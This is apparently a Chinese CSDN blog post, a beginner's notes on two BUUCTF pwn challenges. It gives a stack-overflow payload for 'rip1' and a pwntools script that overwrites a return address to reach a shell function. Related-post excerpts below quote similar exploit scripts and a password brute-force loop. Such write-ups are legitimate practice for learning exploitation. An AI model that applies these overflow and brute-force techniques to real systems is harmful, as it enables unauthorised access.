第一天

最新推荐文章于 2023-05-25 23:35:57 发布
最新推荐文章于 2023-05-25 23:35:57 发布
阅读量116 收藏
点赞数
分类专栏: 笔记 pwn题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49766582/article/details/116139276
版权

做了两道水题,我就是个废物
第一题 buu rip1
可以看出漏洞在gets函数上,栈溢出
可以在栈中写代码在这里插入图片描述
这里很神奇,可以通过代码看出s是15个字节的
但是通过gdb调试rbp到rsp之间有16字节,实际上仔细看第一行最后一个数字是d0不是41(A)
所以要构造15+8=23字节的垃圾数据
在这里插入图片描述在这里插入图片描述

payload=b"A"*23+p64(0x401016)+p64(0x401186)

第二题 warmup题

1 from pwn import *
2 context.log_level = ‘debug’ #显示调试的信息
3 p = remote(“node3.buuoj.cn”,29083)
4 bin_sh_addr = 0x40060d
5 payload =b"A"*72 + p64(bin_sh_addr)
6 p.sendline(payload)
7 p.interactive()
~

m0_49766582
关注
专栏目录
pandas获取DataFrame每月(每年)第一天或者最后一天对应行的实战代码
weixin_43178406的博客
05-26 1万+
本文主要介绍了pandas获取DataFrame每月(每年)第一天对应行的实战代码,希望能对学习pandas的同学们有所帮助。 文章目录 1. 问题描述 2. 解决方案 2.1 筛选每月第一天所有行的数据 2.2 筛选每月最后一天所有行的数据 2.3 筛选每年第一天所有行的数据 2.4 筛选每年最后一天所有行的数据
yolov8实战第一天——yolov8部署并训练自己的数据集(保姆式教程)
最新发布
qq_34717531的博客
12-15 1万+
YOLOv8是一种基于深度神经网络的目标检测算法,它是YOLO(You Only Look Once)系列目标检测算法的最新版本。YOLOv8的主要改进包括:更高的检测精度:通过引入更深的卷积神经网络和更多的特征层,YOLOv8可以在保持实时性的同时提高检测精度。更快的检测速度:通过对模型进行优化,YOLOv8可以在不降低检测精度的情况下提高检测速度。支持更多的检测任务:除了传统的物体检测任务之外,YOLOv8还支持人脸检测、车辆检测等更多的检测任务。
buu rip1
weixin_42238862的博客
10-02 1万+
文章目录前言一、看看程序有没有保护二、对程序源码进行分析1.判断溢出点2.手动测试溢出字符长度3.EXP总结 前言 本人刚刚入坑二进制不久,因为以前主玩渗透测试,所以喜欢学习理论的同时,做一些实战的题目,这不就在BUU上看到了一道pwn的入门题RIP1,但是这个题也让我知道二进制的门槛不是一般的高,第一次写文章,大佬勿喷! 一、看看程序有没有保护 常规操作,查看程序的位数以及各种保护机制!可以看到程序是linux下的程序为64位,并且没有开启任何保护 二、对程序源码进行分析 1.判断溢出点 把程序拖进
buu rip
qq_45691294的博客
12-10 2028
连接上题目环境后,发现可以输入字符,然后得到返回 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传 用IDA分析程序,发现主函数和一个名为fun的子函数 先看main函数的汇编代码和伪代码 get很明显没有限制输入,那么就存在溢出的漏洞,在字符串表中又发现了/bin/sh的字符,在fun函数中用了system函数进入到/bin/sh,那么就可以通过将fun函数的地址覆盖到返回地址就可以实现溢出获得系统权限 双击s查看输入点在栈的位置,发现只需存入15个字节即可劫持函数返回地址,因此
BUUCTF刷题之路-rip1
qq_30528603的博客
05-25 1454
因为A存入内存是以ASCLL码形式存在 0x41就是A,我们填入的15个A已经在栈上了,而且返回地址就是401100,我们要做的就是覆盖这个返回地址,指向我们的后门函数fun,至此这题就完成了。让我们能得到一个shell.那我们就找一下这个fun函数的地址,因为题目没有开启PIE,所以程序每次加载的地址都是不变的。可以看到保护基本没开,是个很简单的栈溢出题目。左边这都是函数,带下划线的一般是系统提供的函数,我们分析前可以大致看看有哪些函数,都干了什么,对整体布局有个了解,我们一开始都回去分析main函数。
栈溢出的基础原理,EBP/EIP/ESP详解 --- buuctf rip 1题目讲解
yajuanpi4899的博客
11-28 5864
栈帧概念:一个基本函数所需要的栈空间,当调用子函数时需要调用新的栈帧 涉及到栈有三个寄存器(32):esp,eip,ebp-->对应64位的rsp,rip,rbp esp:指向当前栈帧的顶部。 ebp:指向当前栈帧的底部。 eip:指向当前栈帧中执行的指令。 栈溢出漏洞的基本方向是:父函数(caller)在调用子函数(callee)结束时,会取子函数的return address,这个地址中保存着父函数的基地址。即:在一个函数调用完以后,就要删除此时的栈帧并将Return Address
buuctf rip 1,ret2text解法
amber_o0k的博客
08-06 1324
from pwn import * io = remote("node4.buuoj.cn",27708) payload = b'a'* 23 + p64(0x40118a) io.sendline(payload) io.interactive() 87和8a两个地址都能奏效,往上往下都不行。
mysql 本月第一天_mysql日期 获取本月第一天 获取下个月的第一天
weixin_31301993的博客
01-19 4529
select curdate(); --获取当前日期select last_day(curdate()); --获取当月最后一天。select DATE_ADD(curdate(),interval -day(curdate())+1 day); --获取本月第一天select date_add(curdate()-day(curdate())+1,interval 1 month); -- 获取...
java 获取本年第一天_java获取年份的第一天和最后一天
weixin_34434843的博客
02-13 3981
下面是编程之家 jb51.cc 通过网络收集整理的代码片段。编程之家小编现在分享给大家,也给大家做个参考。package com.dada.test;import java.text.SimpleDateFormat;import java.util.Calendar;import java.util.Date;/*** @author li_yueling* @version 1.0 2011-...
java 获取当年_java获取当年第一天
weixin_42126865的博客
02-20 4686
/*** 当前月第一天** @return 当前月第一天*/public String getThisMonth() {// 获取前月的第一天Calendar calendar = Calendar.getInstance();SimpleDateFormat format = new SimpleDateFormat(“yyyy-MM-dd”);calendar.add(Calendar.MON...
buuctf pwn rip 1,rop解法
amber_o0k的博客
11-07 1192
from pwn import * io = remote('node4.buuoj.cn', 27175) pop_rdi_ret=0x4011fb bin_sh=0x40201b syscall=0x401040 ret=0x401016 payload=b'a'*(0xf+8)+p64(ret)+p64(pop_rdi_ret)+p64(bin_sh)+p64(syscall) io.sendline(payload) io.interactive() 这个解法有点复杂了,强行构造了一波rop。.
BUUCTF|rip
cm_zl
04-30 2156
from pwn import * context.log_level = 'debug' io=remote('node3.buuoj.cn', "28808") payload = "A"*(0xf + 8) + p64(0x401198)+ p64(0x401186) io.sendline(payload) io.interactive()
BUU BRUTE 1
豆傻小饼干随记
03-03 3821
import requests url = "http://ceeed4e8-1dd2-4fb5-8a98-3bda683fa9bf.node3.buuoj.cn/?username=admin&password=" for i in range(6400, 7000): res = requests.get(url + str(i)) print("[*] Try:", i) if res.text != "密码错误,为四位数字。": print(res..
BUUCTF (PWN) RIP详细分析
qy201706的博客
04-08 1万+
很简单的栈溢出,不过对于栈溢出具体过程不理解的会卡的很惨; 由于初学嘛,就看了网上的wp,好像都是之前版本的,现在用就不太对,可能我入坑BUUCTF比较晚,现在用的题都是运行在Ubuntu18上的,故需要考虑堆栈平衡~~
BUUCTF笔记之Pwn部分WP
克格莫(有需要的私信)
06-07 402
二进制是我的弱项,这里记录一些简单的pwn题。 1.test_your_nc
[BUUCTF]PWN------rip
BangSen1的博客
01-13 327
rip 例行检查,无保护 运行一下,输出了我们输入的东西, 用64位IDA打开,看到了/bin/sh
rip-buuoj
怪味巧克力的博客
07-15 1031
#前言 今天开始学pwn,以练促学,学以致用,加油加油 0x01 拿到文件,首先检查一下是多少位的,如图 可以看到是64位的文件 检查是否有保护,如图 看到没有任何保护 0x02 ida分析一下函数的逻辑 进入到反汇编如下,代码逻辑就是让我们输入,然后结束,我们主要看一下gets,因为gets有栈溢出漏洞 我们发现输入的地址空间大小为15,然后就执行函数返回地址,那么我们直接在15后将系统命令函数地址填入即可,或者直接写函数的名称,然后取函数地址也可以 0x03 exp from pwn impo
[BUUCTF-pwn]——rip
Y_peak的博客
01-30 1221
BUUCTF——rip 题目地址:https://buuoj.cn/challenges 题目: 同样我们现将文件下载下来,在Linux上用checksec 看下信息,发现这是一个64位程序,并且任何保护都没开。???? (任何保护都没开,基本就是栈溢出) 在window用IDA反汇编看看,打扰了main函数没有任何有用的东西,没有我们要找的system函数 看看其他函数看看有没有,功夫不负有心人。fun函数中,有我们想要的东西 赶快查看下fun函数所在的位置 0x401186 。我们看到是在0x
buu firmware
YenKoc的博客
04-05 751
一.路由器固件,给的是bin文件,要用binwalk将固件文件系统提取出来,同时binwalk的版本要完整不然解压不了文件,下面说的很清楚了。 https://blog.csdn.net/QQ1084283172/article/details/65441110 一直安装失败,算是云做题吧,还没写完,待续,电脑一直鬼畜 ...
oracle第一天函数
08-08
在Oracle的函数中,第一天函数(FIRST_DAY)是一个常用的函数,用于获取给定日期的月份的第一天。 首先,要使用FIRST_DAY函数,我们需要提供一个日期作为输入参数。这个日期可以是一个具体的日期,也可以是一个日期...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值